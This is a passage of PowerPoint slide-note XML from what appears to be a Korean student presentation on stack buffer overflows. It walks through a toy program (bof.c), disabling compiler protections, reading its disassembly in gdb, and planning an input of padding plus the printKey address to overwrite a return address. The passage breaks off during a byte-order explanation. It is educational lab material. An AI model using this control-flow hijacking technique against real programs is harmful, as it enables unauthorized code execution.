              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격자가 원하는 대로 프로그램의 실행 흐름을 바꿀 수 있게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78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언어에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격에 취약함 함수는 당연하게도 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>buffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 사용하는 함수들 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이것들은 모두 버퍼의 사이즈</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>즉 입력받을 데이터의 크기를 고려하지 않은채 버퍼에 모두 입력을 받으려 하기 때문에 문제가 발생합니다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BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격 실습의 목차입니다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6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이것은 오늘 제가 공격할 코드입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>주제 소개 발표때와 같은 로직입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>사용자에게 문자열을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>입력받고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 그것이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>와 같으면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출하고 다르면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>wrong </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 출력합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격의 목표는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출할 때의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 주로로 덮어씌워 강제로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수가 호출되도록 하는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코드의 이름은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>bof.c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77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프로세스의 실행 과정을 분석하기 위해선 코드를 컴파일하고 디버깅을 해야합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>저는 그 도구로 리눅스를 선택했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그 이유는 리눅스 환경이 디버깅 과정이 편리하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>다양한 유용한 기능을 제공하기 때문입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>먼저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>gcc </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어로 컴파일을 할 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>단순히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>–o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어로 컴파일 할 수도 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>다음 명령어는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>bof.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 컴파일 해서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는 실행파일을 만드는 명령어 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 약간의 문제가 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>다음 절에서 설명드리겠지만 리눅스에는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격을 막기 위한 다양한 기법이 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그 기능을 해제하기 위해 다음과 같은 명령어를 추가해야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이는 추후에 다시 설명드리도록 하겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이제 다음과 같이 컴파일을 해주면 실행파일의 준비는 완료되었습니다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64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gdb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어를 통해 프로그램을 디버깅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그림은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>gdb bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 통해 디버깅 모드에 돌입한 모습입니다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1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발표의 큰 흐름은 이론적 배경 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt; BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격 실습 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>대처 방안 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24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그다음으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>gdb main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 입력하면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수 내부의 명령어를 어셈블리어로 볼 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이는 원래 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>code segment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 들어있는 값입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>글씨가 작아 잘 안보이실 텐데 제일 먼저 체크해야 할 것은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>+35</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출하고 있고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>+63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>행에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출하고 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이를 통해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>pinrtKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>0x0804848b </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>인것을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우리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 취약점을 이용하는 것이기 때문에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>scanf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수 이후의 명령어들은 볼 필요가 없습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출할 때의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 주소만 넣어주면 공격이 끝나기 때문입니다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8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그럼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 처음부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>scanf </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>까지 하나하나 살펴보도록 하겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>메인함수도</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 마찬가지로 프롤로그 작업을 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>메인함수를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 호출한 함수의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>base pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. (main </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출하는 함수도 존재합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이는 당장은 알 필요가 없습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그리고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 현재 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 값을 가리키게 되고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에는 이제 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>메인함수의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>base pointer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>가 들어가 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>sub </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어를 통해 스택을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>확장시켰습니다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 세 줄의 명령어는 큰 의미를 찾지 못했습니다만</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>일단 살펴보도록 하겠습니다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mov </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수에는 접미사가 붙어 삽입할 데이터의 크기를 지정해 줄 수 있습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(b : 8bit , w : 16bit, l : 32bit, q : 64bit)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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트 아래에 어떤 값을 삽입하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, 16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트 아래에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, 12</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>비트 아래에도 어떠한 값을 삽입해 주는 것을 볼 수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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>w 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바이트 이므로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트의 공간을 차지하고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일종의 안전장치 일수도 있겠습니다만 뚜렷한 용도는 잘 모르겠습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. BOF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>공격에 큰 영향을 주진 않습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>그다음은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 인자를 스택에 넣어주고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먼저 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>만큼의 아래 공간의 주소를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 넣어줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>스택상의 공간을 보아 그 곳의 주소가 문자열 변수 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 시작주소임을 눈치챌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그다음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 스택에 넣어줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 두번 째 인자인 값을 저장할 변수의 주소를 먼저 스택에 넣어줍니다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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>0x804858</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>을 넣어주는데 마치 어떤 값의 주소처럼 보입니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>gdb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>명령어인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>x/s 0x804858f </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 이용해 그 값이 무엇인지 확인했떠니 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>“%s”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>라는 문자열임을 확인했습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>이는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 첫 번째 인자입니다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scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출해 줍니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>. scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 프롤로그 과정이 실행되고 사용자 입력을 받아들이기 위해 버퍼를 생성합니다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37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공격의 목표는 입력 버퍼와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>ebp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>값을 임의의 값으로 채우고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>return address </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>printKey </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수의 주소를 넣어서 강제로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>함수를 호출하도록 하는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scanf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>는 버퍼를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 크기인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트만큼 할당합니다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ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>레지스터의 값은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트입니다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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>14</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>번 입력하고 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>진수 형태로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>바이트씩 끊어서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>printKey</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>의 주소를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>번에 걸쳐 입력해주면 될 것 같습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>하지만 여기엔 두가지 문제가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첫번째는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>byte order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05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현존하는 시스템들은 두 가지의 바이트 순서</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(byte order)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 가지게 되는데 이는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>big endain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>과 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>little endian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>방식으로 나뉩니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
